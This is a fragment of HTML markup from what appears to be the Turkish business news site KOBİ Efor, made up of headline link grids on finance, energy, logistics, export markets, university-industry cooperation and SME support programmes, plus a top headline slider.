<a href="http://www.kobi-efor.com.tr/dijital-bankacilik/finans-sektorunde-teknoloji-devriminin-adi-dijital-bankacilik-h6802.html" title="Finans sektöründe teknoloji devriminin adı; Dijital Bankacılık"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/finans_sektorunde_teknoloji_devriminin_adi_dijital_bankacilik_h6802_649a4.jpg" alt="Finans sektöründe teknoloji devriminin adı; Dijital Bankacılık" />
<b>Finans sektöründe teknoloji devriminin adı; Dijital Bankacılık</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/insaat/turkiye-muteahhitler-birligi-gidisati-belirsiz-toparlanma-h6716.html" title="Türkiye Müteahhitler Birliği: Gidişatı belirsiz toparlanma”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_muteahhitler_birligi_gidisati_belirsiz_toparlanma_h6716_9a580.jpg" alt="Türkiye Müteahhitler Birliği: Gidişatı belirsiz toparlanma”" />
<b>Türkiye Müteahhitler Birliği: “Gidişatı belirsiz toparlanma”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/enerji/turkiye-petrollerine-3-yeni-istasyon-h6722.html" title="Türkiye Petrollerine 3 yeni istasyon"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_petrollerine_3_yeni_istasyon_h6722_28ce7.jpg" alt="Türkiye Petrollerine 3 yeni istasyon" />
<b>Türkiye Petrolleri’ne 3 yeni istasyon</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/enerji/smart-energy-sumec-ile-gunes-paneli-fabrikasi-kuruyor-h6725.html" title="Smart Energy, Sumec ile güneş paneli fabrikası kuruyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/smart_energy_sumec_ile_gunes_paneli_fabrikasi_kuruyor_h6725_f7d71.jpg" alt="Smart Energy, Sumec ile güneş paneli fabrikası kuruyor" />
<b>Smart Energy, Sumec ile güneş paneli fabrikası kuruyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/enerji/enerjisa-ak-yatirim-isbirligi-ile-ozel-sektor-tahvil-ihracini-gerceklestirdi-h6724.html" title="Enerjisa, Ak Yatırım işbirliği ile özel sektör tahvil ihracını gerçekleştirdi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/enerjisa_ak_yatirim_isbirligi_ile_ozel_sektor_tahvil_ihracini_gerceklestirdi_h6724_249ff.jpg" alt="Enerjisa, Ak Yatırım işbirliği ile özel sektör tahvil ihracını gerçekleştirdi" />
<b>Enerjisa, Ak Yatırım işbirliği ile özel sektör tahvil ihracını gerçekleştirdi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/enerji/schneider-electric-elektrik-kazalarina-karsi-uyariyor-h6723.html" title="Schneider Electric elektrik kazalarına karşı uyarıyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/schneider_electric_elektrik_kazalarina_karsi_uyariyor_h6723_2f46a.jpg" alt="Schneider Electric elektrik kazalarına karşı uyarıyor" />
<b>Schneider Electric elektrik kazalarına karşı uyarıyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/lojistik/turkven-mng-kargoyu-satin-aldi-h6727.html" title="Turkven, MNG Kargoyu satın aldı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkven_mng_kargoyu_satin_aldi_h6727_4bba3.jpg" alt="Turkven, MNG Kargoyu satın aldı" />
<b>Turkven, MNG Kargo’yu satın aldı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/lojistik/denizcilikte-binlerce-kisiye-is-imkani-h6728.html" title="Denizcilikte binlerce kişiye iş imkanı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/denizcilikte_binlerce_kisiye_is_imkani_h6728_b612c.jpg" alt="Denizcilikte binlerce kişiye iş imkanı" />
<b>Denizcilikte binlerce kişiye iş imkanı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/lojistik/dhl-dr1-drone-yaris-serisinin-global-isim-sponsoru-oldu-h6729.html" title="DHL, DR1 Drone Yarış Serisinin global isim sponsoru oldu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dhl_dr1_drone_yaris_serisinin_global_isim_sponsoru_oldu_h6729_3b8d2.jpg" alt="DHL, DR1 Drone Yarış Serisinin global isim sponsoru oldu" />
<b>DHL, DR1 Drone Yarış Serisi’nin global isim sponsoru oldu</b></a>
</div>
</div></div><div class="katelement kat_k5">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/geliskin-ekonomilerin-ilk-uc-ayagindan-biri-japonya-h6735.html" title="Gelişkin ekonomilerin ilk üç ayağından biri; JAPONYA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/geliskin_ekonomilerin_ilk_uc_ayagindan_biri_japonya_h6735_20d0d.jpg" alt="Gelişkin ekonomilerin ilk üç ayağından biri; JAPONYA" />
<b>Gelişkin ekonomilerin ilk üç ayağından biri; JAPONYA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turkiye-icin-stratejik-ekonomik-partner-endonezya-h6598.html" title="Türkiye için stratejik ekonomik partner ENDONEZYA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_icin_stratejik_ekonomik_partner_endonezya_h6598_ae333.jpg" alt="Türkiye için stratejik ekonomik partner ENDONEZYA" />
<b>Türkiye için stratejik ekonomik partner ENDONEZYA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turk-kobilerine-onyargisiz-ulke-arnavutluk-h6525.html" title="Türk KOBİlerine önyargısız  ülke ARNAVUTLUK"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turk_kobilerine_onyargisiz_ulke_arnavutluk_h6525_5283b.jpg" alt="Türk KOBİlerine önyargısız  ülke ARNAVUTLUK" />
<b>Türk KOBİ’lerine önyargısız  ülke ARNAVUTLUK</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turkiyenin-neredeyse-disinda-kaldigi-abd-pazari-h6408.html" title="Türkiyenin, neredeyse dışında kaldığı ABD PAZARI"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyenin_neredeyse_disinda_kaldigi_abd_pazari_h6408_3ab8a.jpg" alt="Türkiyenin, neredeyse dışında kaldığı ABD PAZARI" />
<b>Türkiye’nin, neredeyse dışında kaldığı ABD PAZARI</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/mal-ve-isbirligi-talepleri/uluslararasi-ticaret-ve-isbirligi-teklifleri-h6496.html" title="Uluslararası Ticaret ve İşbirliği Teklifleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/uluslararasi_ticaret_ve_isbirligi_teklifleri_h6496_b2b64.jpg" alt="Uluslararası Ticaret ve İşbirliği Teklifleri" />
<b>Uluslararası Ticaret ve İşbirliği Teklifleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/kobilerimizin-disine-uygun-bir-pazar-ukrayna-h6313.html" title="KOBİlerimizin dişine uygun bir Pazar UKRAYNA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kobilerimizin_disine_uygun_bir_pazar_ukrayna_h6313_09432.jpg" alt="KOBİlerimizin dişine uygun bir Pazar UKRAYNA" />
<b>KOBİ’lerimizin dişine uygun bir Pazar UKRAYNA</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/yukselen-buyuk-ekonomilerden-pakistan-h6206.html" title="Yükselen büyük ekonomilerden PAKİSTAN"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yukselen_buyuk_ekonomilerden_pakistan_h6206_c7461.jpg" alt="Yükselen büyük ekonomilerden PAKİSTAN" />
<b>Yükselen büyük ekonomilerden PAKİSTAN</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/mal-ve-isbirligi-talepleri/uluslararasi-ticaret-ve-isbirligi-teklifleri-h6263.html" title="Uluslararası Ticaret ve İşbirliği Teklifleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/uluslararasi_ticaret_ve_isbirligi_teklifleri_h6263_dd253.jpg" alt="Uluslararası Ticaret ve İşbirliği Teklifleri" />
<b>Uluslararası Ticaret ve İşbirliği Teklifleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turkiyenin-dogu-afrikadaki-pazar-hedefleri-madagaskar-mozambik-tanzanya-h6133.html" title="Türkiyenin Doğu Afrikadaki pazar hedefleri: MADAGASKAR-MOZAMBİK-TANZANYA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyenin_dogu_afrikadaki_pazar_hedefleri_madagaskar_mozambik_tanzanya_h6133_d6cc7.png" alt="Türkiyenin Doğu Afrikadaki pazar hedefleri: MADAGASKAR-MOZAMBİK-TANZANYA" />
<b>Türkiye’nin Doğu Afrika’daki pazar hedefleri: MADAGASKAR-MOZAMBİK-TANZANYA</b></a>
</div>
</div></div><div class="katelement kat_k44">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/universite/istanbul-sehir-universitesinin-iddiasi-donanimli-kampus-nitelikli-ogrenci-h6740.html" title="İstanbul Şehir Üniversitesinin iddiası; Donanımlı kampüs, nitelikli öğrenci"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/istanbul_sehir_universitesinin_iddiasi_donanimli_kampus_nitelikli_ogrenci_h6740_a66d5.jpg" alt="İstanbul Şehir Üniversitesinin iddiası; Donanımlı kampüs, nitelikli öğrenci" />
<b>İstanbul Şehir Üniversitesi’nin iddiası; Donanımlı kampüs, nitelikli öğrenci</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/sabanci-universitesi-sucool-girisimcileri-londrada-h6737.html" title="Sabancı Üniversitesi SUCOOL Girişimcileri Londrada"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sabanci_universitesi_sucool_girisimcileri_londrada_h6737_0e002.jpg" alt="Sabancı Üniversitesi SUCOOL Girişimcileri Londrada" />
<b>Sabancı Üniversitesi SUCOOL Girişimcileri Londra’da</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/gtu-ve-teknopark-istanbul-isbirligine-imza-atti-h6739.html" title="GTÜ ve Teknopark İstanbul, işbirliğine imza attı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gtu_ve_teknopark_istanbul_isbirligine_imza_atti_h6739_f436d.jpg" alt="GTÜ ve Teknopark İstanbul, işbirliğine imza attı" />
<b>GTÜ ve Teknopark İstanbul, işbirliğine imza attı</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/mobilya-sektorunde-universite-sanayi-isbirligi-h6736.html" title="Mobilya sektöründe üniversite-sanayi işbirliği"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mobilya_sektorunde_universite_sanayi_isbirligi_h6736_96085.jpg" alt="Mobilya sektöründe üniversite-sanayi işbirliği" />
<b>Mobilya sektöründe üniversite-sanayi işbirliği</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/btulu-muhendis-adaylari-mitsubishi-electric-robotuyla-projeler-gelistiriyor-h6738.html" title="BTÜlü mühendis adayları Mitsubishi Electric robotuyla projeler geliştiriyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/btulu_muhendis_adaylari_mitsubishi_electric_robotuyla_projeler_gelistiriyor_h6738_14882.jpg" alt="BTÜlü mühendis adayları Mitsubishi Electric robotuyla projeler geliştiriyor" />
<b>BTÜ’lü mühendis adayları Mitsubishi Electric robotuyla projeler geliştiriyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/universite/kadir-has-universitesinin-egitimde-iddiasi-nitelikli-ogretim-nitelikli-ogrenci-h6597.html" title="Kadir Has Üniversitesinin eğitimde iddiası; Nitelikli öğretim nitelikli öğrenci"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kadir_has_universitesinin_egitimde_iddiasi_nitelikli_ogretim_nitelikli_ogrenci_h6597_63359.jpg" alt="Kadir Has Üniversitesinin eğitimde iddiası; Nitelikli öğretim nitelikli öğrenci" />
<b>Kadir Has Üniversitesi’nin eğitimde iddiası; Nitelikli öğretim nitelikli öğrenci</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/enerjisa-itu-cekirdek-ile-girisimcileri-destekliyor-h6617.html" title="Enerjisa İTÜ Çekirdek ile girişimcileri destekliyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/enerjisa_itu_cekirdek_ile_girisimcileri_destekliyor_h6617_00580.jpg" alt="Enerjisa İTÜ Çekirdek ile girişimcileri destekliyor" />
<b>Enerjisa İTÜ Çekirdek ile girişimcileri destekliyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/limaktan-mit-ve-bogazici-ortakligina-destek-h6616.html" title="Limaktan MIT ve Boğaziçi ortaklığına destek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/limaktan_mit_ve_bogazici_ortakligina_destek_h6616_2d172.jpg" alt="Limaktan MIT ve Boğaziçi ortaklığına destek" />
<b>Limak’tan MIT ve Boğaziçi ortaklığına destek</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/yapi-kredi-mef-isbirligi-mezunlarini-verdi-h6614.html" title="Yapı Kredi MEF işbirliği mezunlarını verdi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yapi_kredi_mef_isbirligi_mezunlarini_verdi_h6614_a3550.jpg" alt="Yapı Kredi MEF işbirliği mezunlarını verdi" />
<b>Yapı Kredi MEF işbirliği mezunlarını verdi</b></a>
</div>
</div></div><div class="katelement kat_k45">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/diger-destekler-h6726.html" title="Diğer destekler"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/diger_destekler_h6726_f6921.jpg" alt="Diğer destekler" />
<b>Diğer destekler</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/kobilerin-buyume-ekosistemi-kumelenme-h6604.html" title="KOBİlerin büyüme ekosistemi: KÜMELENME"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kobilerin_buyume_ekosistemi_kumelenme_h6604_c5c45.jpg" alt="KOBİlerin büyüme ekosistemi: KÜMELENME" />
<b>KOBİ’lerin büyüme ekosistemi: KÜMELENME</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/kobilere-kamu-destekleri-destek-cok-arastir-bul-h6562.html" title="KOBİlere kamu destekleri; destek çok, araştır bul"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kobilere_kamu_destekleri_destek_cok_arastir_bul_h6562_9d44e.jpg" alt="KOBİlere kamu destekleri; destek çok, araştır bul" />
<b>KOBİ’lere kamu destekleri; destek çok, araştır bul</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/yuksek-teknoloji-destek-kaynaklari-h6406.html" title="Yüksek Teknoloji Destek Kaynakları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yuksek_teknoloji_destek_kaynaklari_h6406_bf9f9.jpg" alt="Yüksek Teknoloji Destek Kaynakları" />
<b>Yüksek Teknoloji Destek Kaynakları</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/destek-ve-tesvik-programlari-h6310.html" title="Destek ve Teşvik programları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/destek_ve_tesvik_programlari_h6310_6d6bf.jpg" alt="Destek ve Teşvik programları" />
<b>Destek ve Teşvik programları</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/haber-degerinde-hatirlatmalar-kamu-destegini-iskalama-h6198.html" title="Haber değerinde hatırlatmalar: KAMU DESTEĞİNİ ISKALAMA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/haber_degerinde_hatirlatmalar_kamu_destegini_iskalama_h6198_f94f8.jpg" alt="Haber değerinde hatırlatmalar: KAMU DESTEĞİNİ ISKALAMA" />
<b>Haber değerinde hatırlatmalar: KAMU DESTEĞİNİ ISKALAMA</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/destek-tesvik-programlari-h6150.html" title="Destek-Teşvik Programları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/destek_tesvik_programlari_h6150_1ff81.png" alt="Destek-Teşvik Programları" />
<b>Destek-Teşvik Programları</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/ekonomi-bakanligi-proje-bazli-yatirim-destegi-h6048.html" title="Ekonomi Bakanlığı Proje Bazlı Yatırım Desteği"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ekonomi_bakanligi_proje_bazli_yatirim_destegi_h6048_12143.png" alt="Ekonomi Bakanlığı Proje Bazlı Yatırım Desteği" />
<b>Ekonomi Bakanlığı Proje Bazlı Yatırım Desteği</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/abden-teknoloji-destekleri-h5935.html" title="ABden teknoloji destekleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/abden_teknoloji_destekleri_h5935_597e4.png" alt="ABden teknoloji destekleri" />
<b>AB’den teknoloji destekleri</b></a>
</div>
</div></div><div class="katelement kat_k47">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/vikodan-gelecegin-teknolojisi-dokunmatik-novella-s-serisi-h6744.html" title="VİKOdan geleceğin teknolojisi; Dokunmatik Novella S Serisi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/vikodan_gelecegin_teknolojisi_dokunmatik_novella_s_serisi_h6744_11d97.jpg" alt="VİKOdan geleceğin teknolojisi; Dokunmatik Novella S Serisi" />
<b>VİKO’dan geleceğin teknolojisi; Dokunmatik Novella S Serisi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/en-seckin-restoranlarda-rezervasyon-zubizu-ile-cok-kolay-h6742.html" title="En seçkin restoranlarda rezervasyon ZUBİZU ile çok kolay"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/en_seckin_restoranlarda_rezervasyon_zubizu_ile_cok_kolay_h6742_fb2cd.jpg" alt="En seçkin restoranlarda rezervasyon ZUBİZU ile çok kolay" />
<b>En seçkin restoranlarda rezervasyon ZUBİZU ile çok kolay</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/singerin-yeni-elektronik-tasinabilir-modeli-featherweight-c240-dikis-makinesi-h6743.html" title="SINGERin yeni elektronik taşınabilir modeli; FEATHERWEIGHT C240 dikiş makinesi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/singerin_yeni_elektronik_tasinabilir_modeli_featherweight_c240_dikis_makinesi_h6743_309e3.jpg" alt="SINGERin yeni elektronik taşınabilir modeli; FEATHERWEIGHT C240 dikiş makinesi" />
<b>SINGER’in yeni elektronik taşınabilir modeli; FEATHERWEIGHT C240 dikiş makinesi</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/somfy-ile-perdelerinizin-kontrolu-artik-tek-dokunusla-sizde-h6741.html" title="Somfy ile perdelerinizin kontrolü artık tek dokunuşla sizde"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/somfy_ile_perdelerinizin_kontrolu_artik_tek_dokunusla_sizde_h6741_cb081.jpg" alt="Somfy ile perdelerinizin kontrolü artık tek dokunuşla sizde" />
<b>Somfy ile perdelerinizin kontrolü artık tek dokunuşla sizde</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/saglik/koneden-hastanelere-ozel-yatak-asansorleri-h6749.html" title="KONEden hastanelere özel yatak asansörleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/koneden_hastanelere_ozel_yatak_asansorleri_h6749_c65b6.jpg" alt="KONEden hastanelere özel yatak asansörleri" />
<b>KONE’den hastanelere özel yatak asansörleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/saglik/kan-ve-kok-hucreden-yapay-deri-uretti-h6750.html" title="Kan ve kök hücreden yapay deri üretti"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kan_ve_kok_hucreden_yapay_deri_uretti_h6750_96a18.jpg" alt="Kan ve kök hücreden yapay deri üretti" />
<b>Kan ve kök hücreden yapay deri üretti</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/13-bin-kisiye-kirsal-kalkinma-egitimi-verilecek-h6757.html" title="13 bin kişiye kırsal kalkınma eğitimi verilecek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/13_bin_kisiye_kirsal_kalkinma_egitimi_verilecek_h6757_bf7fc.jpg" alt="13 bin kişiye kırsal kalkınma eğitimi verilecek" />
<b>13 bin kişiye kırsal kalkınma eğitimi verilecek</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/pinar-enstitusu-ile-sutumuzun-gelecegi-bilincli-ellerde-h6758.html" title="Pınar Enstitüsü ile Sütümüzün Geleceği Bilinçli Ellerde”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/pinar_enstitusu_ile_sutumuzun_gelecegi_bilincli_ellerde_h6758_8b807.jpg" alt="Pınar Enstitüsü ile Sütümüzün Geleceği Bilinçli Ellerde”" />
<b>Pınar Enstitüsü ile “Sütümüzün Geleceği Bilinçli Ellerde”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/hayata-destek-mevsimlik-tarim-iscisi-cocuklarin-izinde-h6756.html" title="Hayata Destek, mevsimlik tarım işçisi çocukların izinde"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/hayata_destek_mevsimlik_tarim_iscisi_cocuklarin_izinde_h6756_29d9e.jpg" alt="Hayata Destek, mevsimlik tarım işçisi çocukların izinde" />
<b>Hayata Destek, mevsimlik tarım işçisi çocukların izinde</b></a>
</div>
</div></div><div class="katelement kat_k46">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/turkiye-is-bankasi-93-yasinda-h6708.html" title="Türkiye İş Bankası 93 yaşında"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_is_bankasi_93_yasinda_h6708_bf63a.jpg" alt="Türkiye İş Bankası 93 yaşında" />
<b>Türkiye İş Bankası 93 yaşında</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/dosya/sem-surekli-egitim-merkezleri-h6804.html" title="SEM Sürekli Eğitim Merkezleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sem_surekli_egitim_merkezleri_h6804_1dc22.jpg" alt="SEM Sürekli Eğitim Merkezleri" />
<b>SEM Sürekli Eğitim Merkezleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/1-milyon-112-bin-kadini-isten-uzaklasti-h6707.html" title="1 milyon 112 bin kadını işten uzaklaştı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/1_milyon_112_bin_kadini_isten_uzaklasti_h6707_7b39c.jpg" alt="1 milyon 112 bin kadını işten uzaklaştı" />
<b>1 milyon 112 bin kadını işten uzaklaştı</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/kocaeli-buyuksehir-belediyesi-ile-gebze-guzeller-osb-isbirligi-yapti-h6709.html" title="Kocaeli Büyükşehir Belediyesi ile Gebze Güzeller OSB işbirliği yaptı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kocaeli_buyuksehir_belediyesi_ile_gebze_guzeller_osb_isbirligi_yapti_h6709_47a66.jpg" alt="Kocaeli Büyükşehir Belediyesi ile Gebze Güzeller OSB işbirliği yaptı" />
<b>Kocaeli Büyükşehir Belediyesi ile Gebze Güzeller OSB işbirliği yaptı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/firma-tanitim/sistem-teknik-ar-geye-odaklandi-uretiminin-yuzde-50sini-ihrac-etti-h6710.html" title="Sistem Teknik Ar-Geye odaklandı üretiminin yüzde 50sini ihraç etti"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sistem_teknik_ar_geye_odaklandi_uretiminin_yuzde_50sini_ihrac_etti_h6710_9d145.jpg" alt="Sistem Teknik Ar-Geye odaklandı üretiminin yüzde 50sini ihraç etti" />
<b>Sistem Teknik Ar-Ge’ye odaklandı üretiminin yüzde 50’sini ihraç etti</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/uzumun-ve-turizmin-dogal-merkezi-bozcaada-h6712.html" title="Üzümün ve turizmin doğal merkezi; BOZCAADA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/uzumun_ve_turizmin_dogal_merkezi_bozcaada_h6712_d1e89.jpg" alt="Üzümün ve turizmin doğal merkezi; BOZCAADA" />
<b>Üzümün ve turizmin doğal merkezi; BOZCAADA</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/tso-platform/milas-tso-onculere-odul-h6734.html" title="Milas TSO: Öncülere ödül"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/milas_tso_onculere_odul_h6734_39ee1.jpg" alt="Milas TSO: Öncülere ödül" />
<b>Milas TSO: Öncülere ödül</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/tso-platform/izmir-to-izto-tataristan-ile-isbirligi-h6731.html" title="İzmir TO (İZTO): Tataristan ile işbirliği"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/izmir_to_izto_tataristan_ile_isbirligi_h6731_4c78e.jpg" alt="İzmir TO (İZTO): Tataristan ile işbirliği" />
<b>İzmir TO (İZTO): Tataristan ile işbirliği</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/tso-platform/samsun-tso-sosyal-medya-egitimi-h6732.html" title="Samsun TSO: Sosyal medya eğitimi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/samsun_tso_sosyal_medya_egitimi_h6732_cce86.jpg" alt="Samsun TSO: Sosyal medya eğitimi" />
<b>Samsun TSO: Sosyal medya eğitimi</b></a>
</div>
</div></div> 
          </div>
                      </div>
        </div>
<!-- MENU ***************************************************** -->
              <!-- UST MANSET -->
        <div id="ustmanset" class="span12">
          <div class="row-fluid">
          <ul class="thumbnails">
				
			<li class="span3"><a href="http://www.kobi-efor.com.tr/kapak/zamanin-ruhu-emrediyor-her-yerde-ve-seyde-dijitallesin-h6801.html" title="Zamanın ruhu emrediyor; Her Yerde ve Şeyde Dijitalleşin!" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/ustmanset-kapak.jpg" alt="Zamanın ruhu emrediyor; Her Yerde ve Şeyde Dijitalleşin!"  />
			<div class="caption-line"><p>Zamanın ruhu emrediyor; Her Yerde...</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/haber/turkiye-is-bankasi-93-yasinda-h6708.html" title="Türkiye İş Bankası 93 yaşında" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/is-bankasi-genel-muduru-adnan-bali-um.jpg" alt="Türkiye İş Bankası 93 yaşında"  />
			<div class="caption-line"><p>Türkiye İş Bankası 93 yaşında</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/dosya/sem-surekli-egitim-merkezleri-h6804.html" title="SEM Sürekli Eğitim Merkezleri" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/ustmanset-sem-surekli_egitim_merkezleri.jpg" alt="SEM Sürekli Eğitim Merkezleri"  />
			<div class="caption-line"><p>SEM Sürekli Eğitim Merkezleri</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/dijital-bankacilik/finans-sektorunde-teknoloji-devriminin-adi-dijital-bankacilik-h6802.html" title="Finans sektöründe teknoloji devriminin adı; Dijital Bankacılık" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/ustmanset-dijital_bankacilik.jpg" alt="Finans sektöründe teknoloji devriminin adı; Dijital Bankacılık"  />
			<div class="caption-line"><p>Dijital Bankacılık</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/osb-tanitim/yeni-nesil-yesil-osb-bagyurdu-osb-bayosb-h6803.html" title="Yeni nesil ‘yeşil’ OSB; Bağyurdu OSB (BAYOSB)" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/bagyurdu-osb-aydin-telseren-um.jpg" alt="Yeni nesil ‘yeşil’ OSB; Bağyurdu OSB (BAYOSB)"  />
			<div class="caption-line"><p>Bağyurdu Organize Sanayi Bölgesi</p></div>						</a>
			</li>


		
           
          </ul>
          </div>
        </div>
        <!-- USTMANSET ***************************************************** -->
                      </div>
        </div>
        <div class="row">
                       <div class="page-header-fixed style span12 hide">
                <div class="title">REEL SEKTÖR: <strong class="title"></strong>
                </div>
                <div class="pull-right">                  <span class="scroll-link" id="yorumyaplink"><i class="halflings-icon white comments"></i> Yorum Yap</span>                  <a class="print" href="javascript:window.print()"><i class="halflings-icon white print"></i> Yazdır</a>
                  <a href="javascript:void(0);" onclick="shareFacebook(fbThumb, fbUrl, fbTitle, fbDesc);" class="" rel="nofollow"><i class="halflings-icon white share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
                </div>
